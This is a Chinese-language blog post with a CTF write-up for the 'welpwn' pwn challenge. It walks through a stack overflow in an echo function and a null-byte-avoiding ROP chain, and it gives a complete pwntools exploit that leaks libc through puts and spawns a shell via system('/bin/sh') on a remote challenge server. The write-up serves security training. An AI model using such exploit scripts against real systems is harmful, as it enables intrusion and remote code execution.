<!DOCTYPE html>

<html lang="en">

<head>
    
    <title>每日一题——welpwn - Hexo</title>
    <meta charset="UTF-8">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
    
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
    <meta name="description" content="每日一题——welpwn这道题是这几天来做的问题比较多的题，好多细节还是理解不到位checksecArch:     amd64-64-little RELRO:    Partial RELRO Stack:    No canary found NX:       NX enabled PIE:      No PIE (0x400000)  什么都没开 反编译后感觉很简单，但是read不能溢">
<meta property="og:type" content="article">
<meta property="og:title" content="每日一题——welpwn">
<meta property="og:url" content="https://wuxiankwy.github.io/2023/09/21/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="每日一题——welpwn这道题是这几天来做的问题比较多的题，好多细节还是理解不到位checksecArch:     amd64-64-little RELRO:    Partial RELRO Stack:    No canary found NX:       NX enabled PIE:      No PIE (0x400000)  什么都没开 反编译后感觉很简单，但是read不能溢">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210212214015901.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L05DX1JldHVybg==,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2023-09-21T12:00:00.000Z">
<meta property="article:modified_time" content="2023-09-21T12:08:53.218Z">
<meta property="article:author" content="WuXianKwY">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20210212214015901.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L05DX1JldHVybg==,size_16,color_FFFFFF,t_70">
    
<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


    <link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1720661474458">
    
    <link rel="stylesheet" href="/css/style.css?v=1720661474458">

    
        
            <link rel="stylesheet" href="/custom.css?v=1720661474458">
        
    

    
<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>


    <script async src="/js/app.js?v=1720661474458"></script>
    
     

    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>

<meta name="generator" content="Hexo 6.3.0"></head>

<body class="mdui-drawer-body-left">
    <div id="nexmoe-background">
        <div class="nexmoe-bg" 
            style="background-image: url(https://s3.bmp.ovh/imgs/2023/07/29/c015f7b9d559ce0e.png)"
        ></div>
        <div class="mdui-appbar mdui-shadow-0">
            <div class="mdui-toolbar">
                <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
                <div class="mdui-toolbar-spacer"></div>
                <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
                <a href="/" title="WuXianKwY" class="mdui-btn mdui-btn-icon"><img src="https://s3.bmp.ovh/imgs/2023/07/29/8245bd214a45fb15.png" alt="WuXianKwY"></a>
            </div>
        </div>
    </div>
    <div id="nexmoe-header">
        <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="WuXianKwY">
            <img src="https://s3.bmp.ovh/imgs/2023/07/29/8245bd214a45fb15.png" alt="WuXianKwY" alt="WuXianKwY">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>12</div>
        <div><span>Tags</span>0</div>
        <div><span>Categories</span>0</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archive" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/PY" title="我的朋友(正在制作)">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友(正在制作)
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/donate" title="给我赞助">
            <i class="mdui-list-item-icon nexmoefont icon-coffee"></i>
            <div class="mdui-list-item-content">
                给我赞助
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/about.html" title="关于博主">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博主
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
        
            
            <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
         
            <form id="search_form" action_e="https://cn.bing.com/search?q=site:nexmoe.com" onsubmit="return search();">
                <label><input id="search_value" name="q" type="search" placeholder="Search"></label>
            </form>
         
    </div>
</div>




        
            
            <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=2t1ToHAIMLu3bpa3QHTu_xTwcD5Mylt3&authKey=aDskDr%2BGy5TIh5OsNTN2jp4SI%2BCmeqr5QFg5OGdXynAqh7RgDs3Q%2BO%2FgOnLdawyI&noverify=0&group_code=757442039"
			target="_blank"
			mdui-tooltip="{content: 'QQ群'}"
			style="
				color: rgb(249, 174, 8);
				background-color: rgba(249, 174, 8, .1);
			"
		>
			<i
				class="nexmoefont icon-QQ"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://space.bilibili.com/397860172"
			target="_blank"
			mdui-tooltip="{content: '哔哩哔哩'}"
			style="
				color: rgb(231, 106, 141);
				background-color: rgba(231, 106, 141, .1);
			"
		>
			<i
				class="nexmoefont icon-bilibili"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://github.com/WuXianKwY/"
			target="_blank"
			mdui-tooltip="{content: 'GitHub'}"
			style="
				color: rgb(25, 23, 23);
				background-color: rgba(25, 23, 23, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://www.zhihu.com/people/nexmoe"
			target="_blank"
			mdui-tooltip="{content: '知乎'}"
			style="
				color: rgb(30, 136, 229);
				background-color: rgba(30, 136, 229, .1);
			"
		>
			<i
				class="nexmoefont icon-zhihu"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://twitter.com/nexmoe"
			target="_blank"
			mdui-tooltip="{content: 'Twitter'}"
			style="
				color: rgb(59, 151, 239);
				background-color: rgba(59, 151, 239, .1);
			"
		>
			<i
				class="nexmoefont icon-twitter"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://nexmoe.com/atom.xml"
			target="_blank"
			mdui-tooltip="{content: 'RSS'}"
			style="
				color: rgb(247, 132, 34);
				background-color: rgba(247, 132, 34, .1);
			"
		>
			<i
				class="nexmoefont icon-rss"
			></i> </a
		>
	</div>
</div>

        
            
            

        
            
            
        
            
            
            
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/">2023</a><span class="archive-list-count">12</span></li></ul>
    </div>
  </div>



        
            
            
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Recent Posts</h3>
    <div class="nexmoe-widget">
      <ul>
        
          <li>
            <a href="/2023/10/16/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E2%80%94%E2%80%94Recho/">攻防世界——Recho</a>
          </li>
        
          <li>
            <a href="/2023/09/21/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn/">每日一题——welpwn</a>
          </li>
        
          <li>
            <a href="/2023/09/18/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94%E6%95%B0%E6%8D%AE%E5%AE%9E%E6%97%B6%E7%9B%91%E6%B5%8B/">每日一题——数据实时监测</a>
          </li>
        
          <li>
            <a href="/2023/09/14/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94ret2libc3%E7%BB%83%E4%B9%A0/">每日一题——ret2libc3练习</a>
          </li>
        
          <li>
            <a href="/2023/09/10/ret2libc3%E2%80%94%E2%80%94%E5%88%A9%E7%94%A8%E5%B7%B2%E7%9F%A5%E5%87%BD%E6%95%B0%E7%9A%84%E7%9C%9F%E5%AE%9E%E5%9C%B0%E5%9D%80%E6%9F%A5%E6%89%BE%E5%81%8F%E7%A7%BB/">利用已知函数的真实地址查找偏移</a>
          </li>
        
      </ul>
    </div>
  </div>

        
            
            <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-link">
		<ul>
        
            <li>
                <a href="https://xiaoshu.app/" target="_blank" >
                    <img src="https://s3.bmp.ovh/imgs/2023/08/15/9297586e75a1ce1f.jpg" alt="小舒同学"></img>
                    <p>小舒同学</p>
                </a>
            </li>
        
            <li>
                <a href="https://nexmoe.com/" target="_blank" >
                    <img src="https://s3.bmp.ovh/imgs/2023/07/29/8245bd214a45fb15.png" alt="嘿！你好！"></img>
                    <p>嘿！你好！</p>
                </a>
            </li>
        
		</ul>
    </div>
</div>
<style>
.nexmoe-widget-wrap .nexmoe-link ul li a {
    text-align : center;
}
.nexmoe-widget-wrap .nexmoe-link ul li a img {
    max-width : 100%;
}
.nexmoe-widget-wrap .nexmoe-link ul li a p {
    margin: 10px 0;
}
</style>

        
    </aside>
    <div class="nexmoe-copyright">
        &copy; 2024 WuXianKwY
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        <br><a target="_blank" href="https://beian.miit.gov.cn/">鄂ICP备2020018486号</a>
<br><a target="_blank" href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral">
<img src="https://i.dawnlab.me/c0268c1e6cfd0863d6ba35be1575941a.png" width="150px"></a>

    </div>
</div><!-- .nexmoe-drawer -->
    </div>
    <div id="nexmoe-content">
        <div class="nexmoe-primary">
    <div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover"> 
            <img src="https://s3.bmp.ovh/imgs/2023/07/29/c015f7b9d559ce0e.png" alt="每日一题——welpwn" loading="lazy">
            <h1>每日一题——welpwn</h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2023年09月21日</a>
        
        
    </div>
    
    
    
    
    
</div>

    <h1 id="每日一题——welpwn"><a href="#每日一题——welpwn" class="headerlink" title="每日一题——welpwn"></a>每日一题——welpwn</h1><h6 id="这道题是这几天来做的问题比较多的题，好多细节还是理解不到位"><a href="#这道题是这几天来做的问题比较多的题，好多细节还是理解不到位" class="headerlink" title="这道题是这几天来做的问题比较多的题，好多细节还是理解不到位"></a>这道题是这几天来做的问题比较多的题，好多细节还是理解不到位</h6><h4 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h4><pre><code>Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
</code></pre>
<p>什么都没开</p>
<p>反编译后感觉很简单，但是read不能溢出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line">&#123;</span><br><span class="line">  char buf; // [rsp+0h] [rbp-400h]</span><br><span class="line"></span><br><span class="line">  write(1, &quot;Welcome to RCTF\n&quot;, 0x10uLL);</span><br><span class="line">  fflush(_bss_start);</span><br><span class="line">  read(0, &amp;buf, 0x400uLL);</span><br><span class="line">  echo((__int64)&amp;buf);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>进入echo()看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">int __fastcall echo(__int64 a1)</span><br><span class="line">&#123;</span><br><span class="line">  char s2[16]; // [rsp+10h] [rbp-10h]</span><br><span class="line"></span><br><span class="line">  for ( i = 0; *(_BYTE *)(i + a1); ++i )</span><br><span class="line">    s2[i] = *(_BYTE *)(i + a1);</span><br><span class="line">  s2[i] = 0;</span><br><span class="line">  if ( !strcmp(&quot;ROIS&quot;, s2) )</span><br><span class="line">  &#123;</span><br><span class="line">    printf(&quot;RCTF&#123;Welcome&#125;&quot;, s2);</span><br><span class="line">    puts(&quot; is not flag&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  return printf(&quot;%s&quot;, s2);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>s2允许输入16个数据，但是有0x400的传入空间，可以进行栈溢出，但是执行一遍发现不行，观察到s2中不能有0出现，而栈溢出中构造的ROP链都有0，所以要另辟蹊径。</p>
<p>如何将rop链传入s2且不被检测到0呢？观察ida中的栈结构发现，echo栈就在main函数上面，二者栈是相连的，我们只需要在buf区构造rop链，然后在buf区利用pop执行所需命令，将rop链先存入payload的底部部分，上方用垃圾数据填充。当echo进行复制时，复制到pop4_ret停止，之后buf区的pop4将前4个栈区弹出，从而执行rop命令，获得got地址进行常规libc</p>
<p>之后再相同格式调用system和bin_sh</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="https://img-blog.csdnimg.cn/20210212214015901.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L05DX1JldHVybg==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" data-caption="在这里插入图片描述" loading="lazy"></p>
<p>exp:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import *</span><br><span class="line">elf = ELF(&#x27;./wel&#x27;)</span><br><span class="line">p = remote(&quot;61.147.171.105&quot;,53215)</span><br><span class="line">pop4_ret = 0x40089c</span><br><span class="line">pop_rdi = 0x4008a3</span><br><span class="line">main_addr = 0x4007CD</span><br><span class="line">read_got = elf.got[&#x27;read&#x27;]</span><br><span class="line">put_plt = elf.plt[&#x27;puts&#x27;]</span><br><span class="line">payload = flat([b&#x27;a&#x27;*0x18,p64(pop4_ret),p64(pop_rdi),p64(read_got),p64(put_plt),p64(main_addr)])</span><br><span class="line">p.recvuntil(b&#x27;to RCTF\n&#x27;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(b&#x27;a&#x27;*0x18)</span><br><span class="line">p.recv(3)</span><br><span class="line">read_addr = u64(p.recv(6).ljust(8, b&quot;\x00&quot;))</span><br><span class="line">libc = LibcSearcher(&quot;read&quot;,read_addr)</span><br><span class="line">libc_base = read_addr - libc.dump(&quot;read&quot;)</span><br><span class="line">system_addr = libc_base + libc.dump(&quot;system&quot;)</span><br><span class="line">bin_sh = libc_base + libc.dump(&quot;str_bin_sh&quot;)</span><br><span class="line">payload = flat([b&#x27;a&#x27;*0x18,p64(pop4_ret),p64(pop_rdi),p64(bin_sh),p64(system_addr)])</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>注：</p>
<p>p.recv(3)是用来接收printf打印的pop4_ret，ljust(8, b”\x00”)是64位程序需要的格式。</p>

    <p><img src="https://s3.bmp.ovh/imgs/2023/08/25/5d9bf97786040a97.jpg" loading="lazy"></p>

  </article>

  
      
    <div class="nexmoe-post-copyright">
        <strong>Author：</strong>WuXianKwY<br>
        <strong>Link：</strong><a href="https://wuxiankwy.github.io/2023/09/21/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn/" title="https:&#x2F;&#x2F;wuxiankwy.github.io&#x2F;2023&#x2F;09&#x2F;21&#x2F;%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn&#x2F;" target="_blank" rel="noopener">https:&#x2F;&#x2F;wuxiankwy.github.io&#x2F;2023&#x2F;09&#x2F;21&#x2F;%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn&#x2F;</a><br>
        
            <strong>内网映射搭建了个本机我的世界多模组服务器，暑假可以一起来玩ya

        
    </div>


  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1720661474418"></script>
  

  
      <div class="nexmoe-post-footer">
          扫码加入QQ群一起玩！

      </div>
  
</div>
</div>
        <div class="nexmoe-post-right">
              <div class="nexmoe-fixed">
                  <div class="nexmoe-tool"> 
                    
                      
                        
                          
                          
                              <button class="mdui-fab catalog" style="overflow:unset;">
                                  <i class="nexmoefont icon-i-catalog"></i>
                                  <div class="nexmoe-toc">
                                      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98%E2%80%94%E2%80%94welpwn"><span class="toc-number">1.</span> <span class="toc-text">每日一题——welpwn</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E8%BF%99%E9%81%93%E9%A2%98%E6%98%AF%E8%BF%99%E5%87%A0%E5%A4%A9%E6%9D%A5%E5%81%9A%E7%9A%84%E9%97%AE%E9%A2%98%E6%AF%94%E8%BE%83%E5%A4%9A%E7%9A%84%E9%A2%98%EF%BC%8C%E5%A5%BD%E5%A4%9A%E7%BB%86%E8%8A%82%E8%BF%98%E6%98%AF%E7%90%86%E8%A7%A3%E4%B8%8D%E5%88%B0%E4%BD%8D"><span class="toc-number">1.0.0.0.0.1.</span> <span class="toc-text">这道题是这几天来做的问题比较多的题，好多细节还是理解不到位</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#checksec"><span class="toc-number">1.0.0.1.</span> <span class="toc-text">checksec</span></a></li></ol></li></ol></li></ol></li></ol>
                                  </div>
                              </button>
                          
                          
                      
                    
                      <a href="#nexmoe-content" class="toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
                  </div>
              </div>
            </div>
    </div>
    <div id="nexmoe-search-space">
	<div class="search-container">
		<div class="search-header">
			<div class="search-input-container">
				<input
					class="search-input"
					type="text"
					placeholder="Search"
					oninput="sinput();"
				/>
			</div>
			<a class="search-close" onclick="sclose();">×</a>
		</div>
		<div class="search-body"></div>
	</div>
</div>

    
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>

</body>

</html>
